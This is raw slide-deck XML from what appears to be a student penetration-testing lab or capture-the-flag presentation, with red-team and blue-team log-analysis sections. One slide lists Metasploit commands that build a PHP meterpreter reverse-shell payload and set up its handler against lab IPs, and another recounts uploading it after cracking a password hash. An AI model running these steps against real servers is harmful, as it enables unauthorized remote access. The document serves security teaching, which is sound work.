            <p:cNvPr id="1115" name="Google Shape;1115;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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01</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1116" name="Google Shape;1116;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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7" name="Google Shape;1117;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1118" name="Google Shape;1118;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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1119" name="Google Shape;1119;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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20" name="Google Shape;1120;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="3154200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created a payload to set up a php reverse shell. Cracked CEO Ryan’s hashed password. Uploaded and executed the PHP payload, creating a reverse shell on the victim’s webserver. Opene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>d a shell, searched for flag.txt file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cat the file and found the flag.</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>FLAG: b1ng0w@5h1sn@m0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1123" name="Google Shape;1123;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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03</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1124" name="Google Shape;1124;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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25" name="Google Shape;1125;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344175" y="1481325"/>
            <a:ext cx="2428500" cy="3252300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom -p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> LHOST=192.168.1.8 LPORT=4444 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>set payload php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>set LHOST 192.168.1.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>set LPORT 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>dav://192.168.1.105/webdav/ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E394EE16-1161-4982-AAD1-6610CF732226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="5592" t="13865" r="30352" b="62711"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6670449" y="4085097"/>
            <a:ext cx="1889951" cy="388448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90ACCF66-12F9-48C3-9FC7-7073FC2B49DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3648027" y="3865937"/>
            <a:ext cx="2124543" cy="267893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D94F1D3A-B33C-487D-9F89-68AD5C794EE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3648027" y="4137924"/>
            <a:ext cx="2124543" cy="144695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{670ADD06-6BAB-41F1-9C52-2A834A9273B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753648" y="3469847"/>
            <a:ext cx="2322777" cy="707197"/>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51"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154;p64"/>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14</a:t>
            </a:fld>
            <a:endParaRPr sz="60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158"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159" name="Google Shape;1159;p65"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="4114800" cy="1269600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161;p65"/>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162" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213725" y="1945575"/>
            <a:ext cx="8409300" cy="2671749"/>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endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712025" y="675975"/>
            <a:ext cx="4911000" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
